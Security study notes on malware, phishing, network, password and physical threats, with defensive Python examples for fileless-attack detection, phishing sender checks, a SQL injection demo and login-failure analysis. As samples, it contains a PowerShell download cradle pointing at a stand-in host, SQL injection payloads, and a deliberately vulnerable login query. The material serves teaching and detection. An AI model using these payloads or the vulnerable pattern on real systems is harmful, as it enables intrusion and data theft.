Malware Types
Virus: malicious code that attaches itself to a legitimate program or document and replicates when the host runs. Needs a user or process to execute the infected host (running an infected file, opening an email attachment).
Worm: self-replicating malware that spreads across networks without user action, typically by exploiting OS or application vulnerabilities or weak credentials.
Trojan horse: malware disguised as legitimate software. Does not self-replicate; when executed it creates a backdoor or performs other malicious actions.
Ransomware: encrypts user files (and increasingly exfiltrates them first, so the victim is also threatened with publication) and demands payment for the decryption key. Common entry points: phishing email, drive-by download, and exposed RDP with weak or brute-forced passwords.
Spyware: secretly monitors user activity.
Keylogger: records keystrokes to steal passwords and credit card numbers.
Adware: displays unwanted advertisements; often bundled with free software.
Rootkit: hides malware (processes, files, network connections) by modifying the OS at a low level, for example with kernel hooks or by tampering with the boot chain. Extremely difficult to detect and remove from inside the running system; may require offline scanning from trusted boot media or OS reinstallation.
Fileless malware: runs in memory without writing an executable to disk. Abuses legitimate OS tools (PowerShell, WMI, mshta, rundll32) for malicious purposes, so file-based signature scanning has nothing to match; detection relies on command-line, script-block and behaviour telemetry instead.
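Because fileless malware leaves no file to scan, the practical detection point is the process command line. The following is an added example (not code from the original notes) that scores constructed command lines for the usual tells: a living-off-the-land binary, PowerShell stealth switches, an -EncodedCommand payload (decoded here, since cradles are usually hidden inside it), a download cradle, and WMIC remote process creation. The LOLBin list, flag aliases and the scoring rule are assumptions chosen for the example; the sample lines are constructed, and the encoded payload is a harmless Write-Host.

```python
"""Flag fileless-style command lines: LOLBin abuse, encoded PowerShell, download cradles."""
import base64
import re

# Living-off-the-land binaries that fileless malware commonly abuses (assumed list).
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# powershell.exe parameter aliases (see `powershell -?`): -EncodedCommand | -ec | -e, and so on.
ENCODED_FLAGS = {"-encodedcommand", "-ec", "-e", "-enc"}
WINDOW_FLAGS = {"-windowstyle", "-w"}
EXEC_POLICY_FLAGS = {"-executionpolicy", "-ep", "-ex"}
QUIET_FLAGS = {"-noprofile", "-nop", "-noninteractive", "-noni", "-nologo"}

# "IEX (New-Object Net.WebClient).DownloadString(...)" and friends.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-expression|\biex\b).*(downloadstring|downloadfile|invoke-webrequest|\biwr\b)",
    re.IGNORECASE,
)
WMIC_PROCESS_CREATE = re.compile(r"process\s+call\s+create", re.IGNORECASE)
STRONG = {"encoded-command", "download-cradle", "wmic-process-create", "hidden-window"}


def encode_command(script: str) -> str:
    """-EncodedCommand takes the script as base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str):
    """Reverse of encode_command; None if the token is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Return the indicators found in one process command line."""
    tokens = cmdline.split()
    exe = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    result = {"exe": exe, "indicators": [], "decoded": None, "suspicious": False}
    if exe not in LOLBINS:
        return result
    result["indicators"].append("lolbin:" + exe)
    for i in range(1, len(tokens)):
        low = tokens[i].lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if low in QUIET_FLAGS:
            result["indicators"].append("quiet:" + low)
        elif low in WINDOW_FLAGS and nxt == "hidden":
            result["indicators"].append("hidden-window")
        elif low in EXEC_POLICY_FLAGS and nxt == "bypass":
            result["indicators"].append("execution-policy-bypass")
        elif low in ENCODED_FLAGS and nxt:
            decoded = decode_command(tokens[i + 1])
            if decoded is not None:
                result["decoded"] = decoded
                result["indicators"].append("encoded-command")
    # Search the raw line and the decoded payload; cradles usually hide in the latter.
    haystack = cmdline + " " + (result["decoded"] or "")
    if DOWNLOAD_CRADLE.search(haystack):
        result["indicators"].append("download-cradle")
    if exe == "wmic.exe" and WMIC_PROCESS_CREATE.search(cmdline):
        result["indicators"].append("wmic-process-create")
    # A LOLBin by itself is routine admin activity; alert on a strong indicator or a stack of weak ones.
    inds = result["indicators"]
    result["suspicious"] = bool(STRONG & set(inds)) or len(inds) >= 3
    return result


# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
    + encode_command("Write-Host 'demo'"),
    "powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"",
    "wmic.exe process call create \"calc.exe\"",
    "powershell.exe -Command Get-ChildItem C:\\Users",
    "notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = analyze_command_line(line)
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["exe"], r["indicators"])
```

The fourth sample (a plain Get-ChildItem) scores only the LOLBin indicator and is not flagged; that is the point of stacking indicators rather than alerting on every PowerShell launch. Real deployments get the same data from Sysmon event 1 or PowerShell script-block logging (event 4104), which also captures scripts that never touch the command line.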
Social Engineering Attacks
Social engineering manipulates people rather than exploiting technology.
Phishing: fraudulent emails impersonating legitimate organizations to steal credentials or deliver malware. Typical tells: a sender domain that only resembles the real one, a display name that does not match the address, manufactured urgency, and link text that differs from the actual URL.
Spear phishing: targeted phishing aimed at specific individuals using personalized information.
Whaling: spear phishing targeting executives or other high-value individuals.
Vishing (voice phishing): phone calls impersonating IT support, banks, or government agencies.
Smishing (SMS phishing): text messages with malicious links.
Tailgating / piggybacking: following an authorized person through a secured door without presenting credentials (tailgating is unnoticed; piggybacking is when the authorized person knowingly holds the door).
Shoulder surfing: observing someone's screen or keyboard to steal credentials.
Dumpster diving: searching physical trash for sensitive information (passwords written on paper, discarded documents).
Impersonation: pretending to be someone else (IT support, executive, vendor) to gain access.
Pretexting: creating a fabricated scenario that gives the target a plausible reason to comply; most impersonation attacks rest on a pretext.
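The sender-domain tells listed under phishing can be checked mechanically. The following is an added example (not part of the original notes) that assesses a From: header against a trusted-domain list: it folds look-alike characters and IDN-encoded labels, measures edit distance for typosquats, spots a trusted brand used as a subdomain of an attacker's domain, and flags a display name that claims a brand the address does not belong to. The trusted-domain list, the confusable table, the distance threshold and the sample headers are all constructed assumptions for the example; a production check would use the Public Suffix List and a full Unicode confusables table.

```python
"""Flag From: headers whose domain impersonates a trusted brand (look-alike, typosquat, display-name spoof)."""
import unicodedata
from email.utils import parseaddr

# Domains the organisation legitimately receives mail from; assumed list for this example.
TRUSTED_DOMAINS = ["example.com", "paypal.com", "microsoft.com"]

# Characters attackers substitute for look-alike ASCII letters (a tiny subset of Unicode confusables).
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "|": "l", "3": "e", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",  # Cyrillic а е о р с
})


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a one- or two-character difference is the typical typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_domain(domain: str) -> str:
    """Decode IDN (xn--) labels, fold confusable characters, and collapse rn->m, vv->w."""
    d = domain.lower().strip(".")
    try:
        d = d.encode("ascii").decode("idna")  # punycode -> Unicode; no-op for plain ASCII labels
    except UnicodeError:
        pass
    d = unicodedata.normalize("NFKC", d).translate(CONFUSABLES)
    return d.replace("rn", "m").replace("vv", "w")  # heuristic; will also fold e.g. "modern"


def registrable(domain: str) -> str:
    """Last two labels; a production check would use the Public Suffix List instead."""
    return ".".join(domain.split(".")[-2:])


def assess_sender(from_header: str) -> dict:
    display, addr = parseaddr(from_header)
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    reasons = []
    if not domain:
        reasons.append("no sender address")
    elif domain not in TRUSTED_DOMAINS:
        norm = normalize_domain(domain)
        labels = norm.split(".")
        reg = registrable(norm)
        for trusted in TRUSTED_DOMAINS:
            brand = trusted.split(".")[0]
            if norm == trusted:
                reasons.append(f"homoglyph of {trusted}")
            elif 0 < levenshtein(reg, trusted) <= 2:
                reasons.append(f"typosquat of {trusted}")
            if brand in labels[:-2]:
                reasons.append(f"brand {trusted} used as subdomain")
            if brand in display.lower() and reg != trusted:
                reasons.append(f"display name claims {trusted}")
    return {"address": addr, "domain": domain, "reasons": reasons, "suspicious": bool(reasons)}


# Constructed sample From: headers for the demonstration (not real mail).
SAMPLE_FROM_HEADERS = [
    '"PayPal" <service@paypal.com>',                        # genuine
    '"PayPal Security" <alerts@paypa1.com>',                # digit 1 for letter l
    '"PayPal" <no-reply@' + "p\u0430ypal.com".encode("idna").decode("ascii") + ">",  # Cyrillic a, as IDN
    '"Billing" <help@paypol.com>',                          # one-letter typosquat
    '"IT Helpdesk" <it@microsoft.com.password-reset.net>',  # brand as a subdomain of the attacker's domain
    '"PayPal Support" <billing@random-mailer.net>',         # display name spoofing
    '"Alice" <alice@gmail.com>',                            # unrelated, legitimate
]

if __name__ == "__main__":
    for header in SAMPLE_FROM_HEADERS:
        verdict = assess_sender(header)
        print("SUSPICIOUS" if verdict["suspicious"] else "ok        ", verdict["domain"], verdict["reasons"])
```

This only inspects the header the attacker chose to write; it complements, and does not replace, SPF/DKIM/DMARC verification of whether the message really came from the domain it names.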
Network-Based Threats
Man-in-the-Middle (MitM) attack: attacker positions themselves between two parties and intercepts their communication. Used for credential theft, session hijacking, or data modification. On-path attack is the modern term for the same thing.
ARP poisoning: sends forged ARP replies so hosts on the LAN map the gateway's (or a victim's) IP address to the attacker's MAC address, redirecting traffic through the attacker's machine (Layer 2 MitM).
DNS poisoning: corrupts a resolver's cache with forged records to redirect users to attacker-controlled sites.
Evil twin / rogue access point: fake Wi-Fi network broadcasting the same or a legitimate-sounding SSID. Users connect thinking it is the real network and the attacker intercepts traffic. TLS limits what can be read, but the attacker still sees destinations and can attempt downgrades or harvest credentials with a fake captive portal.
DoS (Denial of Service): makes a target unavailable, usually by flooding it with traffic, sometimes by triggering a crash or resource exhaustion with a small number of malformed requests.
DDoS (Distributed DoS): DoS launched from many compromised systems (a botnet) at once, which is far harder to filter by source address.
SQL injection: attacker-supplied input spliced into a database query so that it is parsed as SQL rather than treated as data. Defeated by parameterized queries, not by input filtering alone.
Cross-site scripting (XSS): malicious script injected into a trusted website and executed in other users' browsers, typically to steal session cookies or act as the victim. (SQL injection and XSS are application-layer attacks, grouped here with the other remote attacks.)
Replay attack: captured authentication traffic replayed to gain unauthorized access. Countered by nonces, timestamps, and session-bound tokens.
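The SQL injection entry above is best understood by seeing the string-built query next to its parameterized fix. The following is an added example (not from the original notes) against an in-memory SQLite database with a constructed two-row user table; the password_hash values are placeholders, not real hashes. It shows the comment payload cutting off the password check and the tautology payload matching every row, and that the same inputs return nothing when bound as parameters.

```python
"""SQL injection: string-built query beside its parameterized fix, on an in-memory SQLite database."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample user table; password_hash values are placeholders, not real hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-of-alice-pw", "admin"), ("bob", "hash-of-bob-pw", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password_hash: str) -> list:
    """Input is spliced into the SQL text, so quotes and comments in it change the query's meaning."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username: str, password_hash: str) -> list:
    """Parameterized query: the driver binds the values; they are never parsed as SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchall()


# Two classic payloads. The comment payload cuts off the password check. The tautology
# payload relies on AND binding tighter than OR, so it must land in the last condition
# ('nobody' AND '' ) OR '1'='1' to match every row; in the username field it would match none.
COMMENT_PAYLOAD = "alice' --"
TAUTOLOGY_PAYLOAD = "' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vuln_comment": login_vulnerable(conn, COMMENT_PAYLOAD, "wrong-hash"),
        "vuln_tautology": login_vulnerable(conn, "nobody", TAUTOLOGY_PAYLOAD),
        "safe_comment": login_safe(conn, COMMENT_PAYLOAD, "wrong-hash"),
        "safe_tautology": login_safe(conn, "nobody", TAUTOLOGY_PAYLOAD),
        "safe_legit": login_safe(conn, "alice", "hash-of-alice-pw"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15} -> {rows}")
```

Python's sqlite3 execute() refuses stacked statements, so a "; DROP TABLE users --" payload fails here even against the vulnerable function; many other database drivers accept them, which is one more reason not to rely on the driver's quirks instead of binding parameters.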
Password Attacks
Brute force: systematically trying every possible password combination. Guaranteed to succeed given enough time, but only practical against an offline hash or a target with no rate limiting or lockout, since the time grows exponentially with password length.
Dictionary attack: tries common words, phrases, leaked passwords, and rule-based variations (Password1, P@ssw0rd!). Much faster than brute force because most human-chosen passwords are in such lists.
Rainbow table attack: looks up password hashes in pre-computed hash-to-password tables instead of hashing candidates at attack time. Only works against unsalted hashes.
Credential stuffing: replays username/password pairs stolen in one breach against other services. Works because users reuse passwords; usually automated across many source IPs, one attempt per account.
Password spraying: tries one common password (e.g., 'Password1') against many accounts, staying under the per-account lockout threshold. Looks like a handful of failed logins per user, so it has to be detected by aggregating failures per source rather than per account.
Countermeasures: long passwords or passphrases (15+ characters; length matters more than composition rules, which NIST SP 800-63B no longer recommends), multi-factor authentication (the password alone is then not enough for any of the attacks above), account lockout or rate limiting (stops brute force, not spraying), password managers, checking new passwords against breach lists, and salted slow hashes (bcrypt, scrypt, Argon2): the salt defeats rainbow tables and the work factor makes offline brute force expensive.
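Brute force and password spraying look alike in a single account's history and different only when failures are grouped by source. The following is an added example (not from the original notes) that parses a constructed authentication log, buckets failed logins by source and time window, and classifies each bucket as brute force (many failures on one account) or spraying (failures spread thinly across many accounts). The log format, the thresholds and the sample addresses are assumptions chosen for the example.

```python
"""Separate brute force from password spraying in auth logs by aggregating failures per source."""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Assumed log format for the example: "<ISO8601 UTC> auth=<ok|fail> src=<ip> user=<name>"
LINE_RE = re.compile(r"^(?P<ts>\S+) auth=(?P<result>ok|fail) src=(?P<src>\S+) user=(?P<user>\S+)$")


def parse_line(line: str):
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # malformed lines are skipped, not fatal
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "result": m["result"], "src": m["src"], "user": m["user"]}


def detect(lines, window_seconds=600, brute_threshold=10, spray_threshold=5) -> list:
    """Bucket failed logins by (source, time window) and classify each bucket.

    brute_force:    many failures against one account from one source (lockout catches this).
    password_spray: failures spread thinly over many accounts from one source, each below
                    the lockout threshold (only visible when aggregated per source).
    """
    failures = defaultdict(lambda: defaultdict(int))  # (src, window) -> user -> failures
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["result"] != "fail":
            continue
        # Fixed windows are simple; a sliding window would avoid splitting a burst at a boundary.
        bucket = int(ev["ts"].timestamp()) // window_seconds
        failures[(ev["src"], bucket)][ev["user"]] += 1

    alerts = []
    for (src, _), per_user in failures.items():
        top_user, top_count = max(per_user.items(), key=lambda kv: kv[1])
        if top_count >= brute_threshold:
            alerts.append({"src": src, "type": "brute_force", "user": top_user, "failures": top_count})
        elif len(per_user) >= spray_threshold and top_count <= 2:
            alerts.append({"src": src, "type": "password_spray", "users": len(per_user),
                           "failures": sum(per_user.values())})
    return alerts


# Constructed sample log (not from a real system). All events fall in one 10-minute window.
SAMPLE_LOG = []
SAMPLE_LOG += [f"2024-05-01T08:00:{i:02d}Z auth=fail src=203.0.113.5 user=alice" for i in range(12)]
SAMPLE_LOG += [f"2024-05-01T08:01:{i:02d}Z auth=fail src=198.51.100.7 user={u}"
               for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
SAMPLE_LOG += [
    "2024-05-01T08:02:00Z auth=fail src=192.0.2.9 user=bob",   # a user mistyping twice
    "2024-05-01T08:02:05Z auth=fail src=192.0.2.9 user=bob",
    "2024-05-01T08:02:10Z auth=ok src=192.0.2.9 user=bob",
    "garbage line that the parser must skip",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Credential stuffing from a botnet is invisible to this per-source view, since each source makes one attempt; it shows up instead as a spike of failures across many accounts from many addresses, or is stopped up front by checking passwords against breach lists and requiring MFA.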
Physical Security Threats
Unauthorized physical access: most logical security controls fail once an attacker has physical access to hardware (booting from other media, removing disks, attaching devices).
Theft: laptops, hard drives, phones, network equipment.
Hardware keyloggers: USB or PS/2 devices plugged between keyboard and computer to capture keystrokes; invisible to software running on the host.
Evil maid attack: attacker with brief physical access to an unattended device modifies hardware or firmware, or installs malware, so that it captures the disk-encryption passphrase or persists after the owner returns. Full-disk encryption alone does not prevent this; a measured or verified boot chain (TPM, Secure Boot) is needed so that tampering is detected.
Skimming: card readers placed over ATM or payment terminals to capture card data, often paired with a pinhole camera or fake keypad to capture the PIN.
Shoulder surfing: viewing screen content in public places.
Physical destruction: servers or networking equipment damaged by disgruntled insiders or criminals.
Countermeasures: cable locks, equipment cages, security cameras, access controls (badges, PINs, mantraps), screen privacy filters, full-disk encryption (protects data at rest when a powered-off or locked device is stolen, not data on a running, unlocked machine), and USB port controls against rogue devices.
Zero-Day and Insider Threats
Zero-day vulnerability: security flaw that is unknown to the vendor (or known but not yet patched) and has no fix available. Zero-day exploit: attack code that targets such a vulnerability. Dangerous because patching and signature-based defenses cannot block it; what remains are layered controls that limit what a successful exploit can do (least privilege, sandboxing, network segmentation, application allow-listing) plus behaviour-based detection and response.
Advanced Persistent Threat (APT): sophisticated, long-term attack campaign, often run by nation-states or organized crime. Goal: persistent access to steal data over months or years rather than quick destruction.
Insider threat: current or former employee, contractor, or business partner who misuses authorized access. Types: malicious insider (intentional), negligent insider (accidental), compromised insider (credentials stolen by an outside attacker).
Mitigation: principle of least privilege, separation of duties, user activity monitoring, and prompt offboarding (disable accounts and revoke keys, badges and tokens the day access ends).